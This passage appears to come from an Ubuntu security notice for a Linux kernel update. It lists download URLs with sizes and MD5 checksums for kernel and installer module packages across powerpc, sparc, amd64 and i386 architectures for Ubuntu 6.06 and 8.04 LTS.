http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    85854 59c8914383ae0624690950d8f844c101\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    60378 183583ac6a0ab738109499861a861ca2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    70420 da9263ada0b850362f022c36b6769f22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115790 ac0661102201e3f682eda1052d987671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   168082 6f375034031b861fe42ba973c9390ded\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40380 c083f0781fb33b64329d10c233affde2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   149304 958f0b630326763cddddce5503f3319d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5:   773010 979da22c264d122841ea140319b365ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb\n      Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5: 15017856 479231852577fdd0e402556287a02059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   163276 481deef18ee50e039791747737619c3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    59308 83efde441d0de3f09bb163e53016a300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz\n      Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc\n      Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb\n      Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb\n      Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    52646 2c736bab70f1efeade320f9062b74729\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   145458 3e087634d61556643c32e342214a0642\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb\n      Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    21598 6d6c27b8756a70466451449e096bd149\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    23690 ceb5d148f00965516252470b41d00b56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    26794 50bb7020338de7d00265de0765578291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32672 7135f346092b651dafed111b91aee44d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    47602 e55422dc48484675642c96bdbc673595\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   137028 